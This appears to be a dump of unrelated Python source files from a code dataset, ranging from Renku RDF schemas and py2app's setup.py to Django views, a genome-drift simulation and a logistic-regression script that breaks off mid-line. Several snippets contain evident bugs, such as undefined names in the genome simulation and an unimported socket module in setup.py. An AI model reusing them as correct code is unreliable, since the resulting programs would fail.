\"\"\"Meta class.\"\"\"\n\n rdf_type = wfprov.ProcessRun\n model = ProcessRun\n unknown = EXCLUDE\n\n association = Nested(prov.qualifiedAssociation, AssociationSchema)\n annotations = Nested(oa.hasTarget, AnnotationSchema, reverse=True, many=True)\n qualified_usage = Nested(prov.qualifiedUsage, UsageSchema, many=True)\n run_parameter = Nested(renku.hasRunParameter, RunParameterSchema, many=True)\n\n\nclass WorkflowRunSchema(ProcessRunSchema):\n \"\"\"WorkflowRun schema.\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n rdf_type = wfprov.WorkflowRun\n model = WorkflowRun\n unknown = EXCLUDE\n\n _processes = Nested(wfprov.wasPartOfWorkflowRun, ProcessRunSchema, reverse=True, many=True, init_name=\"processes\")\n\n\nclass V9ProjectSchema(JsonLDSchema):\n \"\"\"Project Schema.\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n rdf_type = [schema.Project, prov.Location]\n model = new_schema.Project\n unknown = EXCLUDE\n\n agent_version = StringList(schema.agent, load_default=\"pre-0.11.0\")\n annotations = Nested(oa.hasTarget, AnnotationSchema, reverse=True, many=True)\n automated_update = fields.Boolean(renku.automatedTemplateUpdate, load_default=True)\n creator = Nested(schema.creator, PersonSchema, load_default=None)\n date_created = DateTimeList(schema.dateCreated, load_default=None, format=\"iso\", extra_formats=(\"%Y-%m-%d\",))\n description = fields.String(schema.description, load_default=None)\n id = fields.Id(load_default=None)\n immutable_template_files = fields.List(renku.immutableTemplateFiles, fields.String(), load_default=list())\n name = fields.String(schema.name, load_default=None)\n template_id = fields.String(renku.templateId, load_default=None)\n template_metadata = fields.String(renku.templateMetadata, load_default=None)\n template_ref = fields.String(renku.templateReference, load_default=None)\n template_source = fields.String(renku.templateSource, load_default=None)\n template_version = fields.String(renku.templateVersion, load_default=None)\n version = StringList(schema.schemaVersion, load_default=\"1\")\n keywords = fields.List(schema.keywords, fields.String(), load_default=None)\n","sub_path":"renku/core/migration/models/v9.py","file_name":"v9.py","file_ext":"py","file_size_in_byte":73959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"98389329","text":"from views import Terrain\nfrom models import Robot, Polygone, Wrapper\nfrom controllers import StrategiePolygone, StrategieAvancerDroitIRL, StrategieTournerIRL\nimport threading\nimport time\nimport sys\n\ntry:\n from robot2I013 import Robot2I013\nexcept: \n from models.RobotIRLInterface import RobotIRLInterface as Robot2I013\n\nstop_thread = True\n\ndef updateStrats(stratCarre, fps):\n stratCarre.start()\n while not stratCarre.stop():\n stratCarre.step()\n time.sleep(1./fps)\n global stop_thread\n stop_thread = False\n\ndef run(cote):\n wrapper = Wrapper.Wrapper(Robot2I013())\n startAvancer = StrategieAvancerDroitIRL.StrategieAvancerDroitIRL(wrapper, 70., 15.)\n startTourner = StrategieTournerIRL.StrategieTournerIRL(wrapper, 0., 0.)\n stratCarre = StrategiePolygone.StrategiePolygone(startAvancer, startTourner, int(cote))\n\n fps = 60\n\n t2 = threading.Thread(target=updateStrats, args=(stratCarre, fps))\n t2.start()\n\n\nif __name__ == '__main__':\n run(sys.argv[1])\n\n","sub_path":"simu6.py","file_name":"simu6.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"639400823","text":"from random import choices, choice, uniform, normalvariate\nfrom numpy import mean, log10\n\nBASES = ['A','T','C','G']\n\nclass Gene:\n\n def __init__(self, length_gene, mutation_rate, functional_cutoff):\n self.seq = \"\".join(choices(BASES, k=length_gene))\n self.mutation_rate = mutation_rate\n self.functional_cutoff = functional_cutoff\n\n def mutate(self):\n self.seq = \"\".join([s if uniform(0,1) > r else choice(list(set(BASES).difference(s))) for s in seq])\n\n def copy(self):\n out = Gene(len(self.seq), self.mutation_rate, self.functional_cutoff)\n out.seq = self.seq\n return out\n\nclass Model:\n\n def __init__(self, min_mut = None, max_mut = None, functional_cutoff = None, var_functional_cutoff = None):\n self.functional_cutoffs = lambda nb_genes : [normalvariate(functional_cutoff,var_functional_cutoff) for g in range(nb_genes)]\n self.mutation_rates = lambda nb_genes : [10**-uniform(log10(min_mut),log10(max_mut)) for g in range(nb_genes)]\n\n\nclass Genome(object):\n mutate = lambda seq, r : \"\".join([s if uniform(0,1) > r else choice(list(set(BASES).difference(s))) for s in seq])\n simi = lambda a,b : sum([x == y for x,y in zip(a,b)])/len(a)\n\n def __get__(self, i):\n return self.genome[i]\n\n def __iter__(self): return iter(self.genome)\n def __getitem__(self, key): return self.genome[key]\n\n def __init__(self, nb_genes, length_genes, model = None):\n self.nb_genes = nb_genes\n self.length_genes = length_genes\n self.model = model\n if self.model:\n self.mutation_rates = self.model.mutation_rates(self.nb_genes)\n self.functional_cutoffs = self.model.functional_cutoffs(self.nb_genes)\n else:\n self.mutation_rates = [0.001]*self.nb_genes\n self.functional_cutoffs = [0.7]*self.nb_genes\n\n self.genome = [Gene(self.length_genes, self.mutation_rates, self.functional_cutoffs) for i,m,f in zip(range(self.nb_genes), self.mutation_rates, self.functional_cutoffs)]\n\n def copy(self):\n out_genome = Genome(self.nb_genes,self.length_genes)\n out_genome.genome = self.genome\n\ngenome = Genome(nb_genes=1000, length_genes=100)\n\ncutoffs = [normalvariate(0.5,0.15) for g in genome]\nvar_muts = [10**-uniform(3,6) for g in genome]\nfunc_cutof = mean(cutoffs)\n\nreps = 100000\n\nmut_rate = mean(var_muts)\n\nori_genome = genome\n\noutp =[\"gen\\tseq_id\\tfunct_id\\tmodel\\n\"]\n\nfor i in range(reps):\n print(i)\n genome = [mutate(s,mut) for s,mut in zip(genome,var_muts)]\n simis = [simi(g1,g2) for g1,g2 in zip(ori_genome, genome)]\n seq_id = mean(simis)\n funct_id = str(sum([s > func_cutof for s in simis])/ len(simis))\n if i%10 == 0:\n outp.append(\"{i}\\t{seq}\\t{funct}\\tvarmuts\\n\".format(i=i, seq=seq_id, funct=funct_id) )\n\ngenome = ori_genome\n\nfor i in range(reps):\n print(i)\n genome = [mutate(s,mut_rate) for s in genome]\n simis = [simi(g1,g2) for g1,g2 in zip(ori_genome, genome)]\n seq_id = mean(simis)\n funct_id = str(sum([s > c for s,c in zip(simis,cutoffs)])/ len(simis))\n if i%10 == 0:\n outp.append(\"{i}\\t{seq}\\t{funct}\\tvarcutoff\\n\".format(i=i, seq=seq_id, funct=funct_id) )\n\ngenome = ori_genome\nfor i in range(reps):\n print(i)\n genome = [mutate(s,mut_rate) for s in genome]\n simis = [simi(g1,g2) for g1,g2 in zip(ori_genome, genome)]\n seq_id = mean(simis)\n funct_id = str(sum([s > func_cutof for s in simis])/ len(simis))\n if i%10 == 0:\n outp.append(\"{i}\\t{seq}\\t{funct}\\tdrift\\n\".format(i=i, seq=seq_id, funct=funct_id))\n\ngenome = ori_genome\n\nfor i in range(reps):\n print(i)\n genome = [mutate(s,mut) for s,mut in zip(genome,var_muts)]\n simis = [simi(g1,g2) for g1,g2 in zip(ori_genome, genome)]\n seq_id = mean(simis)\n funct_id = str(sum([s > c for s,c in zip(simis,cutoffs)])/ len(simis))\n if i%10 == 0:\n outp.append(\"{i}\\t{seq}\\t{funct}\\tvarboth\\n\".format(i=i, seq=seq_id, funct=funct_id) )\n\n\n\nwith open(\"out.tsv\",\"w\") as handle:\n handle.writelines(outp)\n","sub_path":"0017_themievo/0017_themievo.py","file_name":"0017_themievo.py","file_ext":"py","file_size_in_byte":4029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"160418397","text":"import matplotlib.pyplot as plt\nimport xlrd\n\n# make a square figure and axes\n# pie chart looks best in square figures\n# otherwise it looks like ellipses\nplt.figure(1, figsize=(8, 8))\nax = plt.axes([0.1, 0.1, 0.8, 0.8])\n\n# The slices will be ordered and plotted counter-clockwise.\nlabels = 'Babo', 'Chunjae', 'Leesang', 'Honran'\n\n\n# make a pie\n\nplt.title('21th election')\n\n# for 안에다가 엑셀파일에 여러 내용을 넣고 그것을 읽어서 그리게 만들면 되는건가?\ndata = []\nfor i in range(100): # 100회 반복\n wb = xlrd.open_workbook(filename='elec.xlsx')\n ws = wb.sheet_by_name('Sheet1')\n\n data = []\n\n for r in range(ws.nrows):\n col = []\n for c in range(ws.ncols):\n col.append(ws.cell(r, c).value)\n data.append(col)\n\n print(data)\n\n plt.pie(data, labels=labels, autopct='%1.1f%%', startangle=67)\n plt.draw() # 그리기\n plt.pause(10) # 잠시 기다리기\n plt.clf() # figure 지우기\n print(\"a\")\n plt.show()\n# 시간 표시 되어있으면 좋다.. 10초후에 계속 바뀌게 해서 그 현황을 보여준다 그래프를 액셀을 가지고 계속 업데이트 해준다\n","sub_path":"5-1.py","file_name":"5-1.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"278353268","text":"\"\"\"MELCloud module\"\"\"\nfrom aiohttp import ClientSession\nimport asyncio\nfrom datetime import timedelta\nfrom typing import List, Optional, Type\n\nfrom pymelcloud.client import Client as _Client, login as _login\nfrom pymelcloud.device import Device\nfrom pymelcloud.atw_device import AtwDevice\nfrom pymelcloud.ata_device import AtaDevice\n\nDEVICE_TYPE_ATA = \"ata\"\nDEVICE_TYPE_ATW = \"atw\"\n\n\nasync def login(\n email: str,\n password: str,\n session: Optional[ClientSession] = None,\n *,\n conf_update_interval: Optional[timedelta] = None,\n device_set_debounce: Optional[timedelta] = None,\n) -> str:\n \"\"\"\n Log in to MELCloud with given credentials.\n \n Returns access token.\n \"\"\"\n client = await _login(\n email,\n password,\n session,\n conf_update_interval=timedelta(minutes=5),\n device_set_debounce=timedelta(seconds=1),\n )\n return client.token\n\n\nasync def get_devices(\n token: str,\n session: Optional[ClientSession] = None,\n *,\n conf_update_interval=timedelta(minutes=5),\n device_set_debounce=timedelta(seconds=1),\n) -> List[Type[Device]]:\n \"\"\"Initialize Devices available with the token.\"\"\"\n client = _Client(\n token,\n session,\n conf_update_interval=conf_update_interval,\n device_set_debounce=device_set_debounce,\n )\n await client.update_confs()\n return {\n DEVICE_TYPE_ATA: [\n AtaDevice(conf, client, set_debounce=device_set_debounce)\n for conf in client.device_confs\n if conf.get(\"Device\", {}).get(\"DeviceType\", -1) == 0\n ],\n DEVICE_TYPE_ATW: [\n AtwDevice(conf, client, set_debounce=device_set_debounce)\n for conf in client.device_confs\n if conf.get(\"Device\", {}).get(\"DeviceType\", -1) == 1\n ],\n }\n","sub_path":"pymelcloud/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"188138996","text":"#!/usr/bin/env python\n\ntry:\n import setuptools\nexcept ImportError:\n import distribute_setup\n distribute_setup.use_setuptools()\n\nimport sys, os\nfrom setuptools import setup, find_packages\nfrom distutils.errors import DistutilsError\nfrom distutils import log\nfrom distutils.core import Command\nfrom fnmatch import fnmatch\n\ntry:\n from distutils.core import PyPIRCCommand\nexcept ImportError:\n PyPIRCCommand = None\n\nfp = open('README.txt')\ntry:\n LONG_DESCRIPTION = fp.read()\nfinally:\n fp.close()\n\nfp = open('doc/changelog.rst')\ntry:\n LONG_DESCRIPTION += '\\n' + fp.read()\nfinally:\n fp.close()\n\nCLASSIFIERS = [\n 'Development Status :: 4 - Beta',\n 'Environment :: Console',\n 'Environment :: MacOS X :: Cocoa',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Natural Language :: English',\n 'Operating System :: MacOS :: MacOS X',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Objective C',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n 'Topic :: Software Development :: User Interfaces',\n 'Topic :: Software Development :: Build Tools',\n]\n\n\nif sys.version_info[0] == 3 or (sys.version_info[:2] >= (2,7)):\n tests_require = []\nelse:\n tests_require = ['unittest2']\n\n\n\n\n\ndef test_loader():\n\n if sys.version_info[0] == 3 or sys.version_info[:2] >= (2, 7):\n import unittest\n else:\n import unittest2 as unittest\n\n topdir = os.path.dirname(os.path.abspath(__file__))\n testModules = [ fn[:-3] for fn in os.listdir(os.path.join(topdir, 'py2app_tests')) if fn.endswith('.py')]\n sys.path.insert(0, os.path.join(topdir, 'py2app_tests'))\n\n suites = []\n for modName in testModules:\n try:\n module = __import__(modName)\n except ImportError:\n print (\"SKIP %s: %s\"%(modName, sys.exc_info()[1]))\n continue\n\n s = unittest.defaultTestLoader.loadTestsFromModule(module)\n suites.append(s)\n\n return unittest.TestSuite(suites)\n\nif PyPIRCCommand is None:\n class upload_docs (Command):\n description = \"upload sphinx documentation\"\n user_options = []\n\n def initialize_options(self):\n pass\n\n def finalize_options(self):\n pass\n\n def run(self):\n raise DistutilsError(\"not supported on this version of python\")\n\nelse:\n class upload_docs (PyPIRCCommand):\n description = \"upload sphinx documentation\"\n user_options = PyPIRCCommand.user_options\n\n def initialize_options(self):\n PyPIRCCommand.initialize_options(self)\n self.username = ''\n self.password = ''\n\n\n def finalize_options(self):\n PyPIRCCommand.finalize_options(self)\n config = self._read_pypirc()\n if config != {}:\n self.username = config['username']\n self.password = config['password']\n\n\n def run(self):\n import subprocess\n import shutil\n import zipfile\n import os\n import urllib\n import StringIO\n from base64 import standard_b64encode\n import httplib\n import urlparse\n\n # Extract the package name from distutils metadata\n meta = self.distribution.metadata\n name = meta.get_name()\n\n # Run sphinx\n if os.path.exists('doc/_build'):\n shutil.rmtree('doc/_build')\n os.mkdir('doc/_build')\n\n p = subprocess.Popen(['make', 'html'],\n cwd='doc')\n exit = p.wait()\n if exit != 0:\n raise DistutilsError(\"sphinx-build failed\")\n\n # Collect sphinx output\n if not os.path.exists('dist'):\n os.mkdir('dist')\n zf = zipfile.ZipFile('dist/%s-docs.zip'%(name,), 'w', \n compression=zipfile.ZIP_DEFLATED)\n\n for toplevel, dirs, files in os.walk('doc/_build/html'):\n for fn in files:\n fullname = os.path.join(toplevel, fn)\n relname = os.path.relpath(fullname, 'doc/_build/html')\n\n print (\"%s -> %s\"%(fullname, relname))\n\n zf.write(fullname, relname)\n\n zf.close()\n\n # Upload the results, this code is based on the distutils\n # 'upload' command.\n content = open('dist/%s-docs.zip'%(name,), 'rb').read()\n \n data = {\n ':action': 'doc_upload',\n 'name': name,\n 'content': ('%s-docs.zip'%(name,), content),\n }\n auth = \"Basic \" + standard_b64encode(self.username + \":\" +\n self.password)\n\n\n boundary = '--------------GHSKFJDLGDS7543FJKLFHRE75642756743254'\n sep_boundary = '\\n--' + boundary\n end_boundary = sep_boundary + '--'\n body = StringIO.StringIO()\n for key, value in data.items():\n if not isinstance(value, list):\n value = [value]\n\n for value in value:\n if isinstance(value, tuple):\n fn = ';filename=\"%s\"'%(value[0])\n value = value[1]\n else:\n fn = ''\n\n body.write(sep_boundary)\n body.write('\\nContent-Disposition: form-data; name=\"%s\"'%key)\n body.write(fn)\n body.write(\"\\n\\n\")\n body.write(value)\n\n body.write(end_boundary)\n body.write('\\n')\n body = body.getvalue()\n\n self.announce(\"Uploading documentation to %s\"%(self.repository,), log.INFO)\n\n schema, netloc, url, params, query, fragments = \\\n urlparse.urlparse(self.repository)\n\n\n if schema == 'http':\n http = httplib.HTTPConnection(netloc)\n elif schema == 'https':\n http = httplib.HTTPSConnection(netloc)\n else:\n raise AssertionError(\"unsupported schema \"+schema)\n\n data = ''\n loglevel = log.INFO\n try:\n http.connect()\n http.putrequest(\"POST\", url)\n http.putheader('Content-type',\n 'multipart/form-data; boundary=%s'%boundary)\n http.putheader('Content-length', str(len(body)))\n http.putheader('Authorization', auth)\n http.endheaders()\n http.send(body)\n except socket.error:\n e = socket.exc_info()[1]\n self.announce(str(e), log.ERROR)\n return\n\n r = http.getresponse()\n if r.status in (200, 301):\n self.announce('Upload succeeded (%s): %s' % (r.status, r.reason),\n log.INFO)\n else:\n self.announce('Upload failed (%s): %s' % (r.status, r.reason),\n log.ERROR)\n\n print ('-'*75) \n print (r.read())\n print ('-'*75)\n\n\ndef recursiveGlob(root, pathPattern):\n \"\"\"\n Recursively look for files matching 'pathPattern'. Return a list\n of matching files/directories.\n \"\"\"\n result = []\n\n for rootpath, dirnames, filenames in os.walk(root):\n for fn in filenames:\n if fnmatch(fn, pathPattern):\n result.append(os.path.join(rootpath, fn))\n return result\n \n\ndef importExternalTestCases(unittest, \n pathPattern=\"test_*.py\", root=\".\", package=None):\n \"\"\"\n Import all unittests in the PyObjC tree starting at 'root'\n \"\"\"\n\n testFiles = recursiveGlob(root, pathPattern)\n testModules = map(lambda x:x[len(root)+1:-3].replace('/', '.'), testFiles)\n if package is not None:\n testModules = [(package + '.' + m) for m in testModules]\n\n suites = []\n \n for modName in testModules:\n try:\n module = __import__(modName)\n except ImportError:\n print(\"SKIP %s: %s\"%(modName, sys.exc_info()[1]))\n continue\n\n if '.' in modName:\n for elem in modName.split('.')[1:]:\n module = getattr(module, elem)\n\n s = unittest.defaultTestLoader.loadTestsFromModule(module)\n suites.append(s)\n\n return unittest.TestSuite(suites)\n\n\nclass test (Command):\n description = \"run test suite\"\n user_options = [\n ('verbosity=', None, \"print what tests are run\"),\n ]\n\n def initialize_options(self):\n self.verbosity='1'\n\n def finalize_options(self):\n if isinstance(self.verbosity, str):\n self.verbosity = int(self.verbosity)\n\n\n def cleanup_environment(self):\n ei_cmd = self.get_finalized_command('egg_info')\n egg_name = ei_cmd.egg_name.replace('-', '_')\n\n to_remove = []\n for dirname in sys.path:\n bn = os.path.basename(dirname)\n if bn.startswith(egg_name + \"-\"):\n to_remove.append(dirname)\n\n for dirname in to_remove:\n log.info(\"removing installed %r from sys.path before testing\"%(\n dirname,))\n sys.path.remove(dirname)\n\n def add_project_to_sys_path(self):\n from pkg_resources import normalize_path, add_activation_listener\n from pkg_resources import working_set, require\n\n self.reinitialize_command('egg_info')\n self.run_command('egg_info')\n self.reinitialize_command('build_ext', inplace=1)\n self.run_command('build_ext')\n\n\n # Check if this distribution is already on sys.path\n # and remove that version, this ensures that the right\n # copy of the package gets tested.\n\n self.__old_path = sys.path[:]\n self.__old_modules = sys.modules.copy()\n\n\n ei_cmd = self.get_finalized_command('egg_info')\n sys.path.insert(0, normalize_path(ei_cmd.egg_base))\n sys.path.insert(1, os.path.dirname(__file__))\n\n # Strip the namespace packages defined in this distribution\n # from sys.modules, needed to reset the search path for\n # those modules.\n\n nspkgs = getattr(self.distribution, 'namespace_packages')\n if nspkgs is not None:\n for nm in nspkgs:\n del sys.modules[nm]\n \n # Reset pkg_resources state:\n add_activation_listener(lambda dist: dist.activate())\n working_set.__init__()\n require('%s==%s'%(ei_cmd.egg_name, ei_cmd.egg_version))\n\n def remove_from_sys_path(self):\n from pkg_resources import working_set\n sys.path[:] = self.__old_path\n sys.modules.clear()\n sys.modules.update(self.__old_modules)\n working_set.__init__()\n\n\n def run(self):\n if sys.version_info[:2] <= (2,6):\n import unittest2 as unittest\n else:\n import unittest\n\n # Ensure that build directory is on sys.path (py3k)\n\n self.cleanup_environment()\n self.add_project_to_sys_path()\n\n try:\n meta = self.distribution.metadata\n name = meta.get_name()\n test_pkg = name + \"_tests\"\n suite = importExternalTestCases(unittest, \n \"test_*.py\", test_pkg, test_pkg)\n\n runner = unittest.TextTestRunner(verbosity=self.verbosity)\n result = runner.run(suite)\n\n # Print out summary. This is a structured format that\n # should make it easy to use this information in scripts.\n summary = dict(\n count=result.testsRun,\n fails=len(result.failures),\n errors=len(result.errors),\n xfails=len(getattr(result, 'expectedFailures', [])),\n xpass=len(getattr(result, 'expectedSuccesses', [])),\n skip=len(getattr(result, 'skipped', [])),\n )\n print(\"SUMMARY: %s\"%(summary,))\n\n finally:\n self.remove_from_sys_path()\nsetup(\n # metadata\n name='py2app',\n version='0.7.3',\n description='Create standalone Mac OS X applications with Python',\n #author='Bob Ippolito',\n #author_email='bob@redivi.com',\n maintainer='Ronald Oussoren',\n maintainer_email=\"ronaldoussoren@mac.com\",\n url='http://bitbucket.org/ronaldoussoren/py2app',\n download_url='http://pypi.python.org/pypi/py2app',\n license='MIT or PSF License',\n platforms=['MacOS X'],\n long_description=LONG_DESCRIPTION,\n classifiers=CLASSIFIERS,\n install_requires=[\n \"altgraph>=0.10.1\",\n \"modulegraph>=0.10.3\",\n \"macholib>=1.5\",\n ],\n tests_require=tests_require,\n cmdclass=dict(\n upload_docs=upload_docs,\n test=test,\n ),\n packages=find_packages(exclude=['py2app_tests']),\n package_data={\n 'py2app.recipes': [\n 'qt.conf',\n ],\n 'py2app.apptemplate': [\n 'prebuilt/main-i386',\n 'prebuilt/main-ppc',\n 'prebuilt/main-x86_64',\n 'prebuilt/main-ppc64',\n 'prebuilt/main-fat',\n 'prebuilt/main-fat3',\n 'prebuilt/main-intel',\n 'prebuilt/main-universal',\n 'lib/__error__.sh',\n 'lib/site.py',\n 'src/main.c',\n ],\n 'py2app.bundletemplate': [\n 'prebuilt/main-i386',\n 'prebuilt/main-ppc',\n 'prebuilt/main-x86_64',\n 'prebuilt/main-ppc64',\n 'prebuilt/main-fat',\n 'prebuilt/main-fat3',\n 'prebuilt/main-intel',\n 'prebuilt/main-universal',\n 'lib/__error__.sh',\n 'lib/site.py',\n 'src/main.m',\n ],\n },\n entry_points={\n 'distutils.commands': [\n \"py2app = py2app.build_app:py2app\",\n ],\n 'distutils.setup_keywords': [\n \"app = py2app.build_app:validate_target\",\n \"plugin = py2app.build_app:validate_target\",\n ],\n 'console_scripts': [\n \"py2applet = py2app.script_py2applet:main\",\n ],\n 'py2app.converter': [\n \"xib = py2app.converters.nibfile:convert_xib\",\n \"datamodel = py2app.converters.coredata:convert_datamodel\",\n \"mappingmodel = py2app.converters.coredata:convert_mappingmodel\",\n ],\n 'py2app.recipe': [\n ]\n },\n\n # py2app/build_app.py uses imp.find_module, and that won't work\n # with a zipped egg.\n #zip_safe=False,\n dependency_links=[], # workaround for setuptools 0.6b4 bug\n)\n","sub_path":"Modules/py2app-0.7.3/py2app-0.7.3-noprebuilt/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":14732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"288694848","text":"import random\nimport requests\nimport time\n\nfrom bs4 import BeautifulSoup\n\nfrom mentalist.settings import load_config, MAIN_CONFIG_FILE\nfrom mentalist.monitoring import setup_logger\n\nlogger = setup_logger(__name__)\n\n\ndef linear_retry(func):\n \"\"\"Linearly retry for the download and unzip processes.\"\"\"\n def wrapper(*args, **kwargs):\n retries = 1\n while retries <= 3:\n result = func(*args, **kwargs)\n if not result:\n time.sleep(retries)\n retries += 1\n else:\n break\n if retries > 3:\n logger.error(\"Tried more than 3 times to %s\", func.__name__)\n return False\n return result\n\n return wrapper\n\n\ndef random_sleep(start=3, finish=6):\n \"\"\"Be a gentleman.\"\"\"\n time.sleep(random.randint(start, finish))\n\n\nclass URLHandler:\n def __init__(self):\n self.HEADERS = load_config(MAIN_CONFIG_FILE, 'headers')\n\n def open_url(self, url):\n try:\n with requests.Session() as sess:\n resp = sess.get(url, headers=self.HEADERS)\n except Exception:\n return False\n else:\n if resp.ok:\n return resp\n else:\n return False\n\n def get_bs_obj(self, url):\n response = self.open_url(url)\n try:\n return BeautifulSoup(response.text)\n except Exception:\n return False","sub_path":"mentalist/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"279650667","text":"from django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.shortcuts import render, redirect\nfrom django.urls import reverse_lazy\nfrom django.views.generic import FormView, DeleteView, UpdateView, DetailView\n\nfrom exam_project.app.forms.transport_offer_form import TransportOfferForm\nfrom exam_project.app.forms.transport_request_form import TransportRequestForm\nfrom exam_project.app.models import TransportRequest, TransportOffer, Warehouse\n\n\nclass TransportRequestCreateView(LoginRequiredMixin, FormView):\n form_class = TransportRequestForm\n\n def form_valid(self, form):\n request = form.save(commit=False)\n request.user = self.request.user\n request.warehouse = Warehouse.objects.get(pk=self.kwargs['pk'])\n request.save()\n return redirect('warehouse details', self.kwargs['pk'])\n\n\nclass TransportRequestDeleteView(LoginRequiredMixin, DeleteView):\n fields = '__all__'\n model = TransportRequest\n template_name = 'request_delete.html'\n context_object_name = 'request'\n\n def get_success_url(self):\n request_to_delete_id = self.kwargs['pk']\n warehouse_id = TransportRequest.objects.get(pk=request_to_delete_id).warehouse.id\n return reverse_lazy('warehouse details', kwargs={'pk': warehouse_id})\n\n\nclass TransportRequestUpdateView(LoginRequiredMixin, UpdateView):\n form_class = TransportRequestForm\n model = TransportRequest\n context_object_name = 'request'\n template_name = 'request_update.html'\n\n def get_success_url(self):\n url = reverse_lazy('request details', kwargs={'pk': self.object.id})\n return url\n\n def form_valid(self, form):\n form.save()\n return super().form_valid(form)\n\n\nclass TransportRequestDetailsView(LoginRequiredMixin, DetailView):\n model = TransportRequest\n template_name = 'request_details.html'\n context_object_name = 'current_request'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n request = self.get_object()\n # admin = self.request.user.id == 1\n context['form'] = TransportOfferForm\n context['created_by'] = request.user\n context['offer_list'] = request.transportoffer_set.all()\n context['can_edit'] = self.request.user == request.user\n context['can_delete'] = self.request.user == request.user\n context['can_quote'] = self.request.user.userprofile.department == \"Pricing\"\n\n return context\n","sub_path":"exam_project/app/views/transport_request_views.py","file_name":"transport_request_views.py","file_ext":"py","file_size_in_byte":2469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"563776935","text":"# Node class \nclass Node: \n \n # Function to initialise the node object \n def __init__(self, data):\n self.data = data\n self.next = None\n \nclass LinkedList: \n \n def __init__(self): \n # Initialize head with a sentinel node\n self.head = Node('dummy')\n \n\n def push(self, new_data): \n new_node = Node(new_data)\n temp = self.head\n while temp.next:\n temp = temp.next\n temp.next = new_node\n return self.head\n \n # Function to get the middle of \n # the linked list \n def printMiddle(self): \n head = self.head\n slow = head\n fast = head\n while fast and fast.next:\n slow = slow.next\n fast = fast.next.next\n print(slow.data) \n\n# Driver code \nlist1 = LinkedList() \nlist1.push(5) \nlist1.push(4) \nlist1.push(2) \nlist1.push(3) \nlist1.push(1) \nlist1.printMiddle() \n\n# Time Complexity - O(n)\n# Space Complexity - O(1)","sub_path":"Exercise_3.py","file_name":"Exercise_3.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"352822658","text":"import operator\nimport numpy as np\nimport sklearn.metrics\nfrom matplotlib import pyplot\nfrom sklearn.preprocessing import scale\nfrom sklearn.model_selection import train_test_split\n\nfrom sklearn.metrics import roc_curve, auc\nfrom scipy import interp\nfrom sklearn.metrics import roc_auc_score\n\n# function: calc_gradient\n# calculates the gradient for a specific weightVector\n# returns: the mean of the gradients as a vector\ndef calc_gradient(weightVector, y_tild, X) :\n size = y_tild.shape[0]\n\n sum = 0\n for index in range(size) :\n sum += (-y_tild[index] * X[index]) / (1 + np.exp(y_tild[index] * weightVector.T * X[index]))\n mean = sum / size\n\n #m = X.shape[0]\n #gradient = (1 / m) * np.dot(X.T, (1 / (1 + np.exp(-(np.dot(X, weightVector))))) - y)\n\n return mean\n\n# function: gradient_descent\n# calculates the gradient descent for a given X matrix with corresponding y vector\ndef gradient_descent( X, y, stepSize, maxIterations) :\n\n # declare weightVector which is initialized to the zero vector\n # one element for each feature\n dimension = X.shape\n features = dimension[1]\n weightVector = np.zeros(features)\n\n # declare weightMatrix of real number\n # number of rows = features, number of cols = maxIterations\n num_of_entries = features * maxIterations\n weightMatrix = np.array(np.zeros(num_of_entries).reshape(features, maxIterations))\n\n size = y.shape[0]\n y_tild = np.empty(size)\n for index in range(size):\n if (y[index] == 0): y_tild[index] = -1\n else : y_tild[index] = 1\n\n for index in range(maxIterations) :\n # first compute the gradient given the current weightVector\n # make sure that the gradient is of the mean logistic loss over all training data\n #print(weightVector)\n gradient = calc_gradient(weightVector, y_tild, X)\n\n # then update weightVector by taking a step in the negative gradient direction\n weightVector = weightVector - stepSize * gradient\n\n # then store the resulting weightVector in the corresponding column of weightMatrix\n for row in range(features) :\n weightMatrix[row][index] = weightVector[row]\n\n return weightMatrix\n\n# function sigmoid\ndef sigmoid(x) :\n x = 1 / (1 + np.exp(-x))\n return x\n\n# read data from csv\nall_data = np.genfromtxt('spam.data', delimiter=\" \")\n# get size of data\nsize = all_data.shape[1] - 1\n# set inputs to everything but last col, and scale\nX = scale(np.delete(all_data, size, axis=1))\n# set outputs to last col of data\ny = all_data[:, size]\n\n# Create train, test, and validation sets\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=1)\nX_train, X_val, y_train, y_val = train_test_split(X_train, y_train, test_size=0.25, random_state=1)\n\n# print sizes of each set\nprint(\"{: >11} {: >4} {: >4}\".format(\"\", \"y\", \"\"))\nprint(\"{: >11} {: >4} {: >4}\".format(\"set\", 0, 1))\nprint(\"{: >11} {: >4} {: >4}\".format(\"train\", np.sum(y_train==0), np.sum(y_train==1)))\nprint(\"{: >11} {: >4} {: >4}\".format(\"test\", np.sum(y_test==0), np.sum(y_test==1)))\nprint(\"{: >11} {: >4} {: >4}\".format(\"validation\", np.sum(y_val==0), np.sum(y_val==1)))\n\n# get weightMatrix\nmaxIterations = 400\nweightMatrix = gradient_descent(X_train, y_train, 0.1, maxIterations)\n\n# vectorize sigmoid function to pass on prediction matrix\nsig_v = 